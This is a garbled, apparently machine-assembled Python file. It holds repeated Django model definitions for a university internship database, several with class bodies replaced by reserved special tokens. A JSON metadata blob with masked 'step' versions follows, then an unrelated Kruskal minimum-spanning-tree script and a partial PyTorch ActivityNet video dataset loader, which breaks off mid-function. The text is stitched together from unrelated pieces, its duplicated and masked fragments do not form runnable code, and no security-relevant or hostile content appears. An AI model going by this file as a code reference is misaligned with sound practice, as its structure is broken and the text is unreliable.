verbose_name = 'Cad.Curso'
class profcoorest(models.Model):
masp = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'profcoorest'
verbose_name = 'Cad.Profcoorest'
class alunos(models.Model):
matricula = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=100)
sexo = models.CharField(max_length=1)
datanasc = models.DateField()
periodo = models.IntegerField()
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'alunos'
verbose_name = 'Cad.Aluno'
class estagio(models.Model):
codigo = models.AutoField(primary_key=True)
aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models
.CASCADE)
profest = models.ForeignKey('profcoorest', db_column='profest',
on_delete=models.CASCADE)
remunerado = models.CharField(max_length=1)
valor = models.DecimalField(max_digits=6, decimal_places=2)
empresa = models.CharField(max_length=30)
cargahr = models.IntegerField()
descr_est = models.CharField(max_length=256)
resp_est = models.CharField(max_length=50)
def __str__(self):
return '%s' % self.codigo
class Meta:
managed = False
db_table = 'estagio'
verbose_name = 'Cad.Estagio'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class faculdades(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
managed = False
db_table = 'faculdades'
verbose_name = 'Cad.Faculdade'
class cursos(models.Model):
codigo = models.AutoField(primary_key=True)
nome = models.CharField(max_length=50)
departamento = models.CharField(max_length=30)
faculdade = models.ForeignKey('faculdades', db_column='faculdade',
on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'cursos'
verbose_name = 'Cad.Curso'
class profcoorest(models.Model):
masp = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'profcoorest'
verbose_name = 'Cad.Profcoorest'
class alunos(models.Model):
matricula = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=100)
sexo = models.CharField(max_length=1)
datanasc = models.DateField()
periodo = models.IntegerField()
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'alunos'
verbose_name = 'Cad.Aluno'
class estagio(models.Model):
codigo = models.AutoField(primary_key=True)
aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models
.CASCADE)
profest = models.ForeignKey('profcoorest', db_column='profest',
on_delete=models.CASCADE)
remunerado = models.CharField(max_length=1)
valor = models.DecimalField(max_digits=6, decimal_places=2)
empresa = models.CharField(max_length=30)
cargahr = models.IntegerField()
descr_est = models.CharField(max_length=256)
resp_est = models.CharField(max_length=50)
def __str__(self):
return '%s' % self.codigo
class Meta:
managed = False
db_table = 'estagio'
verbose_name = 'Cad.Estagio'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class faculdades(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'faculdades'
verbose_name = 'Cad.Faculdade'
class cursos(models.Model):
codigo = models.AutoField(primary_key=True)
nome = models.CharField(max_length=50)
departamento = models.CharField(max_length=30)
faculdade = models.ForeignKey('faculdades', db_column='faculdade',
on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'cursos'
verbose_name = 'Cad.Curso'
class profcoorest(models.Model):
masp = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'profcoorest'
verbose_name = 'Cad.Profcoorest'
class alunos(models.Model):
matricula = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=100)
sexo = models.CharField(max_length=1)
datanasc = models.DateField()
periodo = models.IntegerField()
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'alunos'
verbose_name = 'Cad.Aluno'
class estagio(models.Model):
codigo = models.AutoField(primary_key=True)
aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models
.CASCADE)
profest = models.ForeignKey('profcoorest', db_column='profest',
on_delete=models.CASCADE)
remunerado = models.CharField(max_length=1)
valor = models.DecimalField(max_digits=6, decimal_places=2)
empresa = models.CharField(max_length=30)
cargahr = models.IntegerField()
descr_est = models.CharField(max_length=256)
resp_est = models.CharField(max_length=50)
def __str__(self):
return '%s' % self.codigo
class Meta:
managed = False
db_table = 'estagio'
verbose_name = 'Cad.Estagio'
<|reserved_special_token_1|>
from django.db import models
class faculdades(models.Model):
codigo = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
cidade = models.CharField(max_length=30)
estado = models.CharField(max_length=20)
pais = models.CharField(max_length=20)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'faculdades'
verbose_name = 'Cad.Faculdade'
class cursos(models.Model):
codigo = models.AutoField(primary_key=True)
nome = models.CharField(max_length=50)
departamento = models.CharField(max_length=30)
faculdade = models.ForeignKey('faculdades', db_column='faculdade',
on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'cursos'
verbose_name = 'Cad.Curso'
class profcoorest(models.Model):
masp = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'profcoorest'
verbose_name = 'Cad.Profcoorest'
class alunos(models.Model):
matricula = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=100)
sexo = models.CharField(max_length=1)
datanasc = models.DateField()
periodo = models.IntegerField()
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'alunos'
verbose_name = 'Cad.Aluno'
class estagio(models.Model):
codigo = models.AutoField(primary_key=True)
aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models
.CASCADE)
profest = models.ForeignKey('profcoorest', db_column='profest',
on_delete=models.CASCADE)
remunerado = models.CharField(max_length=1)
valor = models.DecimalField(max_digits=6, decimal_places=2)
empresa = models.CharField(max_length=30)
cargahr = models.IntegerField()
descr_est = models.CharField(max_length=256)
resp_est = models.CharField(max_length=50)
def __str__(self):
return '%s' % self.codigo
class Meta:
managed = False
db_table = 'estagio'
verbose_name = 'Cad.Estagio'
<|reserved_special_token_1|>
from django.db import models
class faculdades(models.Model):
    """ORM mapping for the pre-existing ``faculdades`` table (colleges)."""
    codigo = models.IntegerField(primary_key = True)  # college code (natural key)
    nome = models.CharField(max_length=50)    # college name
    cidade = models.CharField(max_length=30)  # city
    estado = models.CharField(max_length=20)  # state
    pais = models.CharField(max_length=20)    # country
    def __str__(self):
        """Display the college by name (e.g. in the Django admin)."""
        return self.nome
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'faculdades'
        verbose_name = 'Cad.Faculdade'  # label shown in the admin UI
class cursos(models.Model):
    """ORM mapping for the pre-existing ``cursos`` table (degree courses)."""
    codigo = models.AutoField(primary_key = True)   # auto-increment course code
    nome = models.CharField(max_length=50)          # course name
    departamento = models.CharField(max_length=30)  # department offering the course
    faculdade = models.ForeignKey('faculdades', db_column='faculdade', on_delete=models.CASCADE)  # owning college
    def __str__(self):
        """Display the course by name."""
        return self.nome
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'cursos'
        verbose_name = 'Cad.Curso'  # label shown in the admin UI
class profcoorest(models.Model):
    """ORM mapping for ``profcoorest`` (internship-coordinating professors)."""
    masp = models.IntegerField(primary_key = True)  # staff registration number (natural key)
    nome = models.CharField(max_length=50)          # professor name
    curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)  # course the professor coordinates
    def __str__(self):
        """Display the professor by name."""
        return self.nome
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'profcoorest'
        verbose_name = 'Cad.Profcoorest'  # label shown in the admin UI
class alunos(models.Model):
    """ORM mapping for the pre-existing ``alunos`` table (students)."""
    matricula = models.IntegerField(primary_key = True)  # enrolment number (natural key)
    nome = models.CharField(max_length=100)  # student name
    sexo = models.CharField(max_length=1)    # sex, single-character code
    datanasc = models.DateField()            # date of birth
    periodo = models.IntegerField()          # current term/semester
    curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)  # course the student is enrolled in
    def __str__(self):
        """Display the student by name."""
        return self.nome
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'alunos'
        verbose_name = 'Cad.Aluno'  # label shown in the admin UI
class estagio(models.Model):
    """ORM mapping for the pre-existing ``estagio`` table (internships)."""
    codigo = models.AutoField(primary_key = True)  # auto-increment internship id
    aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models.CASCADE)           # intern (student)
    profest = models.ForeignKey('profcoorest', db_column='profest', on_delete=models.CASCADE)  # supervising professor
    remunerado = models.CharField(max_length=1)  # paid internship flag, single-character code
    valor = models.DecimalField(max_digits=6, decimal_places=2)  # stipend amount
    empresa = models.CharField(max_length=30)     # company name
    cargahr = models.IntegerField()               # workload in hours (presumably weekly -- confirm with schema)
    descr_est = models.CharField(max_length=256)  # internship description
    resp_est = models.CharField(max_length=50)    # responsible contact for the internship
    def __str__(self):
        """Display the internship by its numeric id."""
        return '%s' % (self.codigo)
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'estagio'
        verbose_name = 'Cad.Estagio'  # label shown in the admin UI
|
flexible
|
{
"blob_id": "20e5220ce23aaaedbfafe599b352f5d3a220e82e",
"index": 6687,
"step-1": "<mask token>\n\n\nclass cursos(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-2": "<mask token>\n\n\nclass faculdades(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def 
__str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-3": "<mask token>\n\n\nclass faculdades(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = 
models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-4": "from django.db import models\n\n\nclass faculdades(models.Model):\n codigo = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n cidade = models.CharField(max_length=30)\n estado = models.CharField(max_length=20)\n pais = models.CharField(max_length=20)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n 
empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-5": "from django.db import models\n\nclass faculdades(models.Model):\n codigo = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=50)\n cidade = models.CharField(max_length=30)\n estado = models.CharField(max_length=20)\n pais = models.CharField(max_length=20)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key = True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key = True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models.CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest', on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = 
models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n \n def __str__(self):\n return '%s' % (self.codigo)\n \n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'",
"step-ids": [
11,
13,
14,
16,
17
]
}
|
[
11,
13,
14,
16,
17
] |
import sys

# Read vertex and edge counts from stdin.
V, E = map(int, sys.stdin.readline().split())

# Disjoint-set parent table: every node starts as its own representative.
node = list(range(V + 1))

# Each edge line is "u v weight"; collect them all, then sort ascending
# by weight as required by Kruskal's algorithm.
graphs = [list(map(int, sys.stdin.readline().split())) for _ in range(E)]
graph = sorted(graphs, key=lambda x: x[2])
def get_parent(parent, x):
    """Return the representative (root) of *x*'s set, compressing the path.

    Iterative two-pass find: first walk up to the root, then point every
    node on the traversed chain directly at it. The original recursive
    version raises RecursionError on chains longer than Python's default
    recursion limit (~1000 links); this version has the same
    post-conditions (same return value, same fully-compressed parent
    table) without that failure mode.
    """
    # Pass 1: locate the root.
    root = x
    while parent[root] != root:
        root = parent[root]
    # Pass 2: path compression — relink every visited node to the root.
    while parent[x] != root:
        parent[x], x = root, parent[x]
    return root
def union_parent(parent, a, b):
    """Merge the sets containing *a* and *b* (root of *a* becomes parent)."""
    root_a = get_parent(parent, a)
    root_b = get_parent(parent, b)
    if root_a == root_b:
        return  # already in the same set; nothing to do
    parent[root_b] = root_a
# Kruskal's MST: take edges in ascending weight order, skipping any edge
# whose endpoints are already connected, until V-1 edges are accepted.
N = 0          # number of edges accepted into the tree so far
distance = 0   # running total of accepted edge weights
idx = 0        # cursor into the weight-sorted edge list
while N < V - 1:
    A, B, dist = graph[idx]
    idx += 1
    if get_parent(node, A) == get_parent(node, B):
        continue  # this edge would create a cycle
    union_parent(node, A, B)
    distance += dist
    N += 1
print(distance)
|
normal
|
{
"blob_id": "2e794e281c6f34858cd32725cdc454eb18c28892",
"index": 3415,
"step-1": "<mask token>\n\n\ndef get_parent(parent, x):\n if parent[x] == x:\n return x\n parent[x] = get_parent(parent, parent[x])\n return parent[x]\n\n\ndef union_parent(parent, a, b):\n a = get_parent(parent, a)\n b = get_parent(parent, b)\n if a != b:\n parent[b] = a\n\n\n<mask token>\n",
"step-2": "<mask token>\nfor i in range(V + 1):\n node.append(i)\nfor _ in range(E):\n graphs.append(list(map(int, sys.stdin.readline().split())))\n<mask token>\n\n\ndef get_parent(parent, x):\n if parent[x] == x:\n return x\n parent[x] = get_parent(parent, parent[x])\n return parent[x]\n\n\ndef union_parent(parent, a, b):\n a = get_parent(parent, a)\n b = get_parent(parent, b)\n if a != b:\n parent[b] = a\n\n\n<mask token>\nwhile N < V - 1:\n A, B, dist = graph[idx]\n if get_parent(node, A) == get_parent(node, B):\n idx += 1\n continue\n union_parent(node, A, B)\n distance += dist\n N += 1\n idx += 1\nprint(distance)\n",
"step-3": "<mask token>\nV, E = map(int, sys.stdin.readline().split())\nnode = []\ngraphs = []\nfor i in range(V + 1):\n node.append(i)\nfor _ in range(E):\n graphs.append(list(map(int, sys.stdin.readline().split())))\ngraph = sorted(graphs, key=lambda x: x[2])\n\n\ndef get_parent(parent, x):\n if parent[x] == x:\n return x\n parent[x] = get_parent(parent, parent[x])\n return parent[x]\n\n\ndef union_parent(parent, a, b):\n a = get_parent(parent, a)\n b = get_parent(parent, b)\n if a != b:\n parent[b] = a\n\n\nN = 0\ndistance = 0\nidx = 0\nwhile N < V - 1:\n A, B, dist = graph[idx]\n if get_parent(node, A) == get_parent(node, B):\n idx += 1\n continue\n union_parent(node, A, B)\n distance += dist\n N += 1\n idx += 1\nprint(distance)\n",
"step-4": "import sys\nV, E = map(int, sys.stdin.readline().split())\nnode = []\ngraphs = []\nfor i in range(V + 1):\n node.append(i)\nfor _ in range(E):\n graphs.append(list(map(int, sys.stdin.readline().split())))\ngraph = sorted(graphs, key=lambda x: x[2])\n\n\ndef get_parent(parent, x):\n if parent[x] == x:\n return x\n parent[x] = get_parent(parent, parent[x])\n return parent[x]\n\n\ndef union_parent(parent, a, b):\n a = get_parent(parent, a)\n b = get_parent(parent, b)\n if a != b:\n parent[b] = a\n\n\nN = 0\ndistance = 0\nidx = 0\nwhile N < V - 1:\n A, B, dist = graph[idx]\n if get_parent(node, A) == get_parent(node, B):\n idx += 1\n continue\n union_parent(node, A, B)\n distance += dist\n N += 1\n idx += 1\nprint(distance)\n",
"step-5": "import sys\n\nV, E = map(int, sys.stdin.readline().split())\n\nnode = []\ngraphs = []\nfor i in range(V+1):\n node.append(i)\n\nfor _ in range(E):\n graphs.append((list(map(int, sys.stdin.readline().split()))))\n\ngraph = sorted(graphs, key=lambda x: x[2])\n\n\ndef get_parent(parent, x):\n if parent[x] == x:\n return x\n parent[x] = get_parent(parent, parent[x])\n return parent[x]\n\n\ndef union_parent(parent, a, b):\n a = get_parent(parent, a)\n b = get_parent(parent, b)\n if a != b:\n parent[b] = a\n\n\nN = 0\ndistance = 0\nidx = 0\nwhile N < V-1:\n A, B, dist = graph[idx]\n if get_parent(node, A) == get_parent(node, B):\n idx += 1\n continue\n\n union_parent(node, A, B)\n distance += dist\n N += 1\n idx += 1\n\nprint(distance)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import pandas
import numpy
import json
import torch.utils.data as data
import os
import torch
def load_json(file):
    """Parse the JSON document at path *file* and return the resulting object."""
    with open(file) as fp:
        return json.load(fp)
class VideoDataSet(data.Dataset):
    """ActivityNet snippet-feature dataset for the TEM stage of BSN.

    Each item yields a (400, temporal_scale) feature tensor; in train
    mode it is paired with three length-``temporal_scale`` target
    sequences (action / start / end probabilities), otherwise with the
    snippet anchor boundaries needed at inference time.
    """

    def __init__(self, opt, subset="train"):
        self.temporal_scale = opt["temporal_scale"]   # temporal length; every video rescaled to this many snippets (e.g. 100)
        self.temporal_gap = 1. / self.temporal_scale  # fraction of the video covered by one snippet
        self.subset = subset                          # training / validation / test
        self.mode = opt["mode"]                       # 'train' or 'test'
        self.feature_path = opt["feature_path"]       # directory holding the per-video feature csv files
        self.boundary_ratio = opt["boundary_ratio"]   # e.g. 0.1: width of the widened boundary region as a fraction of GT length
        self.video_info_path = opt["video_info"]      # csv with per-video meta information
        self.video_anno_path = opt["video_anno"]      # json with per-video annotations
        self._getDatasetDict()
        self.check_csv()

    def check_csv(self):
        """Drop videos whose feature csv is missing, plus known-bad samples.

        Some feature files may be absent or corrupted on disk.
        """
        # Iterate over a snapshot: removing from self.video_list while
        # iterating it directly would silently skip the element after
        # every removal (bug in the original version).
        for video in list(self.video_list):
            if not os.path.exists(self.feature_path + "csv_mean_" + str(self.temporal_scale) + "/" + video + ".csv"):
                print("video :{} feature csv is not existed".format(video))
                self.video_list.remove(video)
                del self.video_dict[video]
        # Remove samples that are known to be broken.
        del_videl_list = ['v_5HW6mjZZvtY']
        for v in del_videl_list:
            if v in self.video_dict:
                print("del " + v + ' video')
                self.video_list.remove(v)
                del self.video_dict[v]
        print("After check: csv \n %s subset video numbers: %d" % (self.subset, len(self.video_list)))

    def _getDatasetDict(self):
        """Build self.video_dict / self.video_list for the requested subset."""
        anno_df = pd.read_csv(self.video_info_path)
        anno_database = load_json(self.video_anno_path)
        self.video_dict = {}  # video name -> annotation info (incl. ground truth)
        for i in range(len(anno_df)):
            video_name = anno_df.video.values[i]
            video_info = anno_database[video_name]
            video_subset = anno_df.subset.values[i]  # subset this video belongs to: training / validation / test
            if self.subset == "full":  # keep every video
                self.video_dict[video_name] = video_info
            if self.subset in video_subset:
                self.video_dict[video_name] = video_info  # keep videos of the requested subset
        self.video_list = list(self.video_dict.keys())  # names of the retained videos
        print("Before check: csv \n %s subset video numbers: %d" % (self.subset, len(self.video_list)))

    def __getitem__(self, index):
        """Return features (+ per-snippet targets in train mode) for one video."""
        video_data, anchor_xmin, anchor_xmax = self._get_base_data(index)
        if self.mode == "train":
            match_score_action, match_score_start, match_score_end = self._get_train_label(index, anchor_xmin, anchor_xmax)
            return video_data, match_score_action, match_score_start, match_score_end
        else:
            return index, video_data, anchor_xmin, anchor_xmax

    def _get_base_data(self, index):
        """Load the (400, temporal_scale) feature tensor and snippet anchors."""
        video_name = self.video_list[index]
        anchor_xmin = [self.temporal_gap * i for i in range(self.temporal_scale)]       # 0.00 .. 0.99
        anchor_xmax = [self.temporal_gap * i for i in range(1, self.temporal_scale + 1)]  # 0.01 .. 1.00
        try:
            video_df = pd.read_csv(self.feature_path + "csv_mean_" + str(self.temporal_scale) + "/" + video_name + ".csv")  # this video's features
        except Exception:
            # The original bare except swallowed the error and then crashed
            # on an undefined video_df; report the file and re-raise.
            print('Error in ' + video_name + ".csv")
            raise
        video_data = video_df.values[:, :]
        video_data = torch.Tensor(video_data)           # this video's features: [100, 400]
        video_data = torch.transpose(video_data, 0, 1)  # [400, 100], convenient for temporal 1-D convolution
        video_data.float()  # no-op kept from the original: result is not assigned, and torch.Tensor is already float32
        return video_data, anchor_xmin, anchor_xmax

    def _get_train_label(self, index, anchor_xmin, anchor_xmax):
        """Generate the three per-snippet TEM target sequences (action/start/end)."""
        video_name = self.video_list[index]
        video_info = self.video_dict[video_name]  # duration_second, duration_frame, annotations, feature_frame
        video_frame = video_info['duration_frame']
        video_second = video_info['duration_second']
        feature_frame = video_info['feature_frame']
        # Corrected duration: features are extracted with a sliding window,
        # so feature_frame can differ slightly from duration_frame.
        corrected_second = float(feature_frame) / video_frame * video_second
        video_labels = video_info['annotations']
        gt_bbox = []
        for j in range(len(video_labels)):  # normalise segment times into [0, 1]
            tmp_info = video_labels[j]
            tmp_start = max(min(1, tmp_info['segment'][0] / corrected_second), 0)
            tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)
            gt_bbox.append([tmp_start, tmp_end])
        gt_bbox = np.array(gt_bbox)
        gt_xmins = gt_bbox[:, 0]
        gt_xmaxs = gt_bbox[:, 1]
        gt_lens = gt_xmaxs - gt_xmins
        gt_len_small = np.maximum(self.temporal_gap, self.boundary_ratio * gt_lens)  # width of the starting/ending regions
        gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + gt_len_small / 2), axis=1)  # starting regions
